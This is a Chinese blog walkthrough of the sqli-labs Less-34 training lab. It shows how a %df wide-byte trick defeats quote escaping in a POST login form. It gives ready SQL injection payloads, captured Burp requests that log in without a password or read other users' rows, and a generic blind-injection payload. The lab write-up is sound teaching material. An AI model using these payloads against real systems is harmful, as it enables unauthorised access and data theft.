sqli-labs————Less-34(宽字节绕过、水平越权、盲注)

Less-34


方法一:
这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: '。我们可以利用这一点注入。

使用万能密码方式来突破:

username: 'or 1=1#

passwor:aaa


方法二:

因为这里使用到了表单的提交,所以我们可以使用burp suite进行数据的提交,之后对提交的数据进行修改:

POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin%df'||1#&passwd=aaa&submit=Submit

从上面我们可以看到,我们并没有输入密码,却成功登录了,已越权

或者可以这样,获取别的用户的信息,实现水平越权:

POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin%df'or 1 limit 1,1#&passwd=aaa&submit=Submit

post型盲注通杀payload:

uname=admin%df'or()or%200%23&passwd=&submit=Submit
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值